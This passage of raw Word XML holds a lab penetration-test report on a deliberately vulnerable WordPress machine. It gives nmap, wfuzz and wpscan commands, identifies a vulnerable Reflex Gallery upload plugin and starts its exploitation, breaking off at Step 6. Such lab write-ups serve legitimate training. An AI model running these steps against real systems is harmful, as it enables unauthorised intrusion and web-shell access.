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1535"/>
        <w:gridCol w:w="9251"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FD6D45" w:rsidRPr="00FD6D45" w14:paraId="6C67E19E" w14:textId="77777777" w:rsidTr="003D6500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785BD" w14:textId="77777777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Machine Description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29482" w14:textId="77777777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A deliberately vulnerable lab machine for practicing web app exploits, privilege escalation, and post-exploitation to gain user and root access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD6D45" w:rsidRPr="00FD6D45" w14:paraId="37AB830E" w14:textId="77777777" w:rsidTr="003D6500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7528D" w14:textId="77777777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Target IP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6C836" w14:textId="7CE6E428" w:rsidR="00FD6D45" w:rsidRPr="00FD6D45" w:rsidRDefault="003C5A82" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>192.168.0.10</w:t>
            </w:r>
            <w:r w:rsidR="007B7977">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD6D45" w:rsidRPr="00FD6D45" w14:paraId="5F00CD4B" w14:textId="77777777" w:rsidTr="003D6500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F75D8" w14:textId="77777777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Vulnerability Name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8BD6E" w14:textId="77777777" w:rsidR="00FD6D45" w:rsidRPr="00FD6D45" w:rsidRDefault="00FD6D45" w:rsidP="00FD6D45">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:num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Unrestricted file upload → Web shell / Remote Code Execution</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19B7F643" w14:textId="77777777" w:rsidR="00FD6D45" w:rsidRPr="00FD6D45" w:rsidRDefault="00FD6D45" w:rsidP="00FD6D45">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:num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Remote command execution via uploaded script</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="416F1EE3" w14:textId="77777777" w:rsidR="00FD6D45" w:rsidRPr="00FD6D45" w:rsidRDefault="00FD6D45" w:rsidP="00FD6D45">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:num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Insecure privileged operation → ability to overwrite system file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD6D45" w:rsidRPr="00FD6D45" w14:paraId="4A9D9975" w14:textId="77777777" w:rsidTr="003D6500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0A67D" w14:textId="77777777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Port / Service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E6FF" w14:textId="77777777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 xml:space="preserve">TCP 80 / http </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD6D45" w:rsidRPr="00FD6D45" w14:paraId="68A5A665" w14:textId="77777777" w:rsidTr="003D6500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4E8A9" w14:textId="77777777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Severity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E55FE" w14:textId="77777777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7.4 high</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD6D45" w:rsidRPr="00FD6D45" w14:paraId="5CEE57CF" w14:textId="77777777" w:rsidTr="003D6500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D6894" w14:textId="468AEF32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Attack Ve</w:t>
            </w:r>
            <w:r w:rsidR="00554903">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD6D45">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>tor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1C137" w14:textId="77777777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CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD6D45" w:rsidRPr="00FD6D45" w14:paraId="1B800EA1" w14:textId="77777777" w:rsidTr="003D6500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B91B7" w14:textId="77777777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Proof of Concept (PoC)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A6181" w14:textId="77777777" w:rsidR="00382ACE" w:rsidRDefault="00382ACE" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5701FA70" w14:textId="53EFF301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b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>STEP 1 –</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD6D45">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> Nmap to find the IP of the target machine.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D890311" w14:textId="487313D8" w:rsidR="00382ACE" w:rsidRPr="00382ACE" w:rsidRDefault="00382ACE" w:rsidP="00382ACE">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00382ACE">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1768E0E9" wp14:editId="0CBEAAFB">
                  <wp:extent cx="4766118" cy="2906486"/>
                  <wp:effectExtent l="0" t="0" r="0" b="8255"/>
                  <wp:docPr id="15588465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5002" cy="29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1762E" w14:textId="2D8F62E5" w:rsidR="00FD6D45" w:rsidRPr="00382ACE" w:rsidRDefault="00FD6D45" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="274F6DDF" w14:textId="77777777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</w:p>
          <w:p w14:paraId="6C0F0853" w14:textId="77777777" w:rsidR="00382ACE" w:rsidRDefault="00382ACE" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1DA5A6BF" w14:textId="77777777" w:rsidR="00382ACE" w:rsidRDefault="00382ACE" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="09AC1C6F" w14:textId="77777777" w:rsidR="00382ACE" w:rsidRDefault="00382ACE" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2D36CF78" w14:textId="612E8CF6" w:rsidR="00FD6D45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b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>STEP 2</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD6D45">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Nmap Scan to discover open ports and Services </w:t>
            </w:r>
            <w:r w:rsidR="00382ACE">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>on that target IP-Address.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A7A68B2" w14:textId="32F000BC" w:rsidR="00382ACE" w:rsidRPr="00FD6D45" w:rsidRDefault="00FD6D45" w:rsidP="00FD6D45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 xml:space="preserve"># nmap </w:t>
            </w:r>
            <w:r w:rsidR="003C5A82">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>-sV -p- -r -sC 192.168.0.10</w:t>
            </w:r>
            <w:r w:rsidR="00382ACE">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD6D45">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00382ACE">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD6D45">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>open</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1317D3DD" w14:textId="1A240BC4" w:rsidR="00382ACE" w:rsidRPr="00382ACE" w:rsidRDefault="00382ACE" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00382ACE">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5242F743" wp14:editId="6932833D">
                  <wp:extent cx="4603245" cy="2424545"/>
                  <wp:effectExtent l="0" t="0" r="6985" b="0"/>
                  <wp:docPr id="4799323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4338" cy="2440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4A008" w14:textId="77777777" w:rsidR="004D00EF" w:rsidRDefault="004D00EF" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3184CB27" w14:textId="76C77F89" w:rsidR="00FD6D45" w:rsidRDefault="00FD6D45" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FD6D45">
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">Step 3- </w:t>
            </w:r>
            <w:r w:rsidR="00382ACE" w:rsidRPr="00E62AEE">
              <w:rPr>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">After finding that there is website running </w:t>
            </w:r>
            <w:r w:rsidR="00E62AEE" w:rsidRPr="00E62AEE">
              <w:rPr>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>on port</w:t>
            </w:r>
            <w:r w:rsidR="00382ACE" w:rsidRPr="00E62AEE">
              <w:rPr>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>:80 then we will do further enumeration on</w:t>
            </w:r>
            <w:r w:rsidR="00E62AEE" w:rsidRPr="00E62AEE">
              <w:rPr>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> it by using </w:t>
            </w:r>
            <w:r w:rsidR="00E62AEE" w:rsidRPr="00E62AEE">
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>WFUZZ</w:t>
            </w:r>
            <w:r w:rsidR="00E62AEE">
              <w:rPr>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> we will see if we are able to get access to any FILE and DIRECTORY on that website. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="414CF7D0" w14:textId="77777777" w:rsidR="004D00EF" w:rsidRDefault="00E62AEE" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278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FILE FUZZING: -</w:t>
            </w:r>
            <w:r w:rsidR="004D00EF">
              <w:rPr>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12BA4D07" w14:textId="5F3245F5" w:rsidR="00E62AEE" w:rsidRDefault="00BE2BA1" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidR="004D00EF" w:rsidRPr="004D00EF">
              <w:rPr>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt --hc 404 "http://192.168.0.10</w:t>
            </w:r>
            <w:r w:rsidR="004D00EF">
              <w:rPr>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="004D00EF" w:rsidRPr="004D00EF">
              <w:rPr>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>:80/FUZZ"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5277C62D" w14:textId="43D2F30C" w:rsidR="00E62AEE" w:rsidRPr="00E62AEE" w:rsidRDefault="00E62AEE" w:rsidP="00E62AEE">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:r w:rsidRPr="00E62AEE">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="275A68EB" wp14:editId="2A4452AA">
                  <wp:extent cx="4667327" cy="3810000"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="27253020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4261" cy="3864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617479" w14:textId="77777777" w:rsidR="004D00EF" w:rsidRDefault="004D00EF" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="29C2B3DB" w14:textId="71F57A4B" w:rsidR="00E62AEE" w:rsidRDefault="00E62AEE" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>DIRECTORY FUZZING: -</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B48372E" w14:textId="0B1FD4C5" w:rsidR="004D00EF" w:rsidRDefault="00BE2BA1" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidR="004D00EF" w:rsidRPr="004D00EF">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt --hc 404 "http://192.168.0.10</w:t>
            </w:r>
            <w:r w:rsidR="004D00EF">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="004D00EF" w:rsidRPr="004D00EF">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>:80/FUZZ/"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="038B5BB3" w14:textId="63334F29" w:rsidR="00E62AEE" w:rsidRPr="00E62AEE" w:rsidRDefault="00E62AEE" w:rsidP="00E62AEE">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E62AEE">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="257E90F2" wp14:editId="3D8DB258">
                  <wp:extent cx="4876800" cy="3561080"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1270"/>
                  <wp:docPr id="167032072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8552" cy="3562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00A423" w14:textId="77777777" w:rsidR="00E62AEE" w:rsidRDefault="00E62AEE" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6A6EF496" w14:textId="2C63C79C" w:rsidR="004D00EF" w:rsidRDefault="004D00EF" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004D00EF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Step</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4: - After finding that there is WordPress Directory, we will do </w:t>
            </w:r>
            <w:r w:rsidRPr="004D00EF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>WP Scan</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004D00EF">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>on</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> that target. </w:t>
            </w:r>
            <w:r w:rsidR="00EB132B">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>First,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> we will </w:t>
            </w:r>
            <w:r w:rsidR="008D7D22">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">enumerate </w:t>
            </w:r>
            <w:r w:rsidR="00EB132B">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>USERS</w:t>
            </w:r>
            <w:r w:rsidR="008D7D22">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> and</w:t>
            </w:r>
            <w:r w:rsidR="00EB132B">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> THEMES.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DD1B4FE" w14:textId="577052A8" w:rsidR="00EB132B" w:rsidRDefault="00BE2BA1" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidR="00EB132B" w:rsidRPr="00EB132B">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">wpscan </w:t>
            </w:r>
            <w:r w:rsidR="00EB132B">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00EB132B" w:rsidRPr="00EB132B">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>--url http://192.168.0.106:80/wordpress/ --enumerate t --enumerate u -v</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C96B2E2" w14:textId="3D6B1AAF" w:rsidR="00EB132B" w:rsidRPr="00EB132B" w:rsidRDefault="00EB132B" w:rsidP="00EB132B">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00EB132B">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D99491D" wp14:editId="13A0BB9F">
                  <wp:extent cx="4470400" cy="4654550"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="0"/>
                  <wp:docPr id="46498456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0400" cy="465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64301E" w14:textId="73BDD1E0" w:rsidR="00EB132B" w:rsidRPr="00EB132B" w:rsidRDefault="00EB132B" w:rsidP="00EB132B">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00EB132B">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46D9A38D" wp14:editId="4592D827">
                  <wp:extent cx="4876800" cy="3000375"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="56765720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300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EEC03" w14:textId="77777777" w:rsidR="00EB132B" w:rsidRDefault="00EB132B" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="23C43E23" w14:textId="11FDA3D0" w:rsidR="00BE2BA1" w:rsidRPr="00C16087" w:rsidRDefault="00EB132B" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00EB132B">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2052DFA0" wp14:editId="631C9B1F">
                  <wp:extent cx="4867275" cy="3228975"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
                  <wp:docPr id="212872795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7275" cy="322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3F6FE" w14:textId="77777777" w:rsidR="00C16087" w:rsidRDefault="00C16087" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00C16087">
              <w:t>The installed plugins were enumerated using WPScan.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4466E87C" w14:textId="486775EE" w:rsidR="00BE2BA1" w:rsidRPr="00C16087" w:rsidRDefault="00BE2BA1" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C16087">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>#wpscan --url http://192.168.0.105:80/wordpress/ --enumerate p  -v</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ACD6028" w14:textId="3A165B0F" w:rsidR="00BE2BA1" w:rsidRPr="00BE2BA1" w:rsidRDefault="00BE2BA1" w:rsidP="00BE2BA1">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE2BA1">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15F388A2" wp14:editId="39F002B4">
                  <wp:extent cx="4895850" cy="3093720"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="88425170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585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6ADE02" w14:textId="77777777" w:rsidR="00BE2BA1" w:rsidRPr="004D00EF" w:rsidRDefault="00BE2BA1" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="26530FB3" w14:textId="54F88C12" w:rsidR="00BE2BA1" w:rsidRPr="00BE2BA1" w:rsidRDefault="00BE2BA1" w:rsidP="00BE2BA1">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BE2BA1">
              <w:rPr>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="341F0D6E" wp14:editId="3B404558">
                  <wp:extent cx="4886325" cy="6638925"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
                  <wp:docPr id="24782080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6325" cy="663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274037" w14:textId="3E2DE3FC" w:rsidR="00AD44B0" w:rsidRDefault="00AD44B0" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0D17E669" w14:textId="0E6AE1B3" w:rsidR="00AD44B0" w:rsidRDefault="00CB7C1B" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB7C1B">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Further analysis of the WPScan results identified the vulnerable Reflex Gallery plugin.</w:t>
            </w:r>
            <w:r w:rsidR="00AD44B0" w:rsidRPr="00AD44B0">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>It is vulnerable to the File Upload. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C756478" w14:textId="720D0116" w:rsidR="007C2607" w:rsidRDefault="007C2607" w:rsidP="007C2607">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Step 5: -</w:t>
            </w:r>
            <w:r w:rsidRPr="007C2607">
              <w:rPr>
                <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="800000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="35"/>
                <w:szCs w:val="35"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007C2607">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Exploiting Reflex Gallery</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B8DFDB0" w14:textId="08240BCC" w:rsidR="007C2607" w:rsidRPr="007C2607" w:rsidRDefault="007C2607" w:rsidP="007C2607">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007C2607">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63FC27C1" wp14:editId="2DBD2D24">
                  <wp:extent cx="4895850" cy="1466850"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="22065759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585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558FF8" w14:textId="05A41D01" w:rsidR="007C2607" w:rsidRDefault="007C2607" w:rsidP="007C2607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POC of File-upload vulnerability.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="384CF4FA" w14:textId="427FB0BE" w:rsidR="007C2607" w:rsidRPr="007C2607" w:rsidRDefault="007C2607" w:rsidP="007C2607">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007C2607">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74D55C90" wp14:editId="566BC3DD">
                  <wp:extent cx="4848225" cy="3562985"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                  <wp:docPr id="159130135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8225" cy="3562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364460" w14:textId="43FC93AB" w:rsidR="007C2607" w:rsidRPr="007C2607" w:rsidRDefault="007C2607" w:rsidP="007C2607">
            <w:pPr>
              <w:spacing w:after="160"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Step 6: - </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Now we will </w:t>
            </w:r>
            <w:r w:rsidRPr="007C2607">
              <w:t>set the argument</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> like </w:t>
            </w:r>
            <w:r w:rsidR="004F3CB5" w:rsidRPr="004F3CB5">
              <w:t>target host IP</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007C2607">
